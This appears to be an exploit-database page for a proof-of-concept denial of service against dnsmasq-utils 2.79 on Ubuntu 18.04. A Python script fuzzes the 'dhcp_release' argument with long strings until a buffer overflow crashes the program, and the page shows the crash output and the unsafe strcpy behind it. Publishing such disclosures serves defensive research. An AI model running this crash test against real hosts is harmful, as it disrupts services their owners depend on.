Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
JosueEncinar
Platform
linux
Release date
2020-04-07
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 | # Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) # Date: 2020-04-06 # Exploit Author: Josue Encinar # Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1 # Version: 2.79 # Tested on: Ubuntu 18.04 from subprocess import Popen, PIPE data = "" bof = False for i in range (1, 200): A = "A"*i data = f"dhcp_release {A} 1 1" try: result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True) error = result.stderr.read().decode() if "Aborted (core dumped)" in error: print("[+] Buffer Overflow detected!") print(f"[*] Offset: {i}") bof = True break except Exception as e: print(f"[-] {e}") if not bof: print("[-] No buffer overflow...") ## Check line 273 in dhcp_release.c ### strcpy(ifr.ifr_name, argv[1]); # ## PoC: # [email protected]:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py # *** buffer overflow detected ***: dhcp_release terminated # [+] Buffer Overflow detected! # [*] Offset: 16 |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-04-07 | "dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)" | dos | linux | JosueEncinar |
2019-10-01 | "kic 2.4a - Denial of Service" | dos | linux | JosueEncinar |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48301/?format=json')
For full documentation follow the link above